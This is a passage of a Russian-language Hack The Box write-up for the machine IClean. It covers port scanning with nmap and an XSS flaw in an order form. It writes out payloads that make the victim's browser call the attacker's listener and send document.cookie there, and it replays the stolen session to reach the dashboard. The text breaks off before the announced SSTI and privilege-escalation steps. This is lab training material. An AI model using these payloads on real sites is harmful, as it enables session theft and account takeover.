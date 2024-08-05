В этом рай­тапе я покажу, как экс­плу­ати­ровать уяз­вимость XSS в для кра­жи cookie поль­зовате­ля, а затем уяз­вимость SSTI — для выпол­нения кода в сис­теме. Для прод­вижения исполь­зуем учет­ные дан­ные, получен­ные из базы дан­ных. При повыше­нии при­виле­гий вос­поль­зуем­ся излишни­ми раз­решени­ями ути­литы qpdf.

На­ша цель — получе­ние прав супер­поль­зовате­ля на машине IСlean с учеб­ной пло­щад­ки Hack The Box. Уро­вень ее слож­ности — сред­ний.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 12 iclean. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr '\ n' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ска­нер нашел все­го два откры­тых пор­та:

22 — служ­ба OpenSSH 8.9p1;

80 — веб‑сер­вер Apache 2.4.52.

Как обыч­но в таких слу­чаях начина­ем с про­вер­ки сай­та.

Точка входа

Изу­чая сайт, находим фор­му заказа услуг.

От­меча­ем все позиции и выпол­няем заказ. Затем в Burp History смот­рим на сам зап­рос к сер­веру и про­веря­ем отправ­ляемые парамет­ры.

В парамет­рах отправ­ляют­ся не зна­чения true и false , что было бы логич­нее, а наз­вание услу­ги. Ско­рее все­го, ука­зан­ные в заказе услу­ги отоб­ража­ются у дру­гого поль­зовате­ля, поэто­му сто­ит про­верить, нет ли здесь XSS. Для это­го запус­тим веб‑сер­вер:

python3 -m http. server

Ком­бинаци­ей кла­виш Ctrl-R перенап­равим зап­рос из Burp History в Burp Repeater и засыла­ем базовую наг­рузку, которая выпол­нит зап­рос на наш веб‑сер­вер.

< img src= x onerror= fetch( "http:// 10. 10. 14. 83: 8000/ test_xss") ; >

В логах видим зап­рос, а зна­чит, сер­вис уяз­вим. Теперь поп­робу­ем увес­ти куки поль­зовате­ля, который прос­матри­вает заказы.

< img src= x onerror= fetch( "http:// 10. 10. 14. 83: 8000/ "+document. cookie) ; >

При­меня­ем иден­тифика­тор сес­сии в локаль­ном хра­нили­ще бра­узе­ра Chrome и перехо­дим на стра­ницу / dashboard .

Нам ста­ли дос­тупны новые фун­кции, прой­дем­ся по ним по поряд­ку.

Точка опоры

Нач­нем с генера­тор QR-кода. Пер­вым делом нам необ­ходимо получить Invoice ID.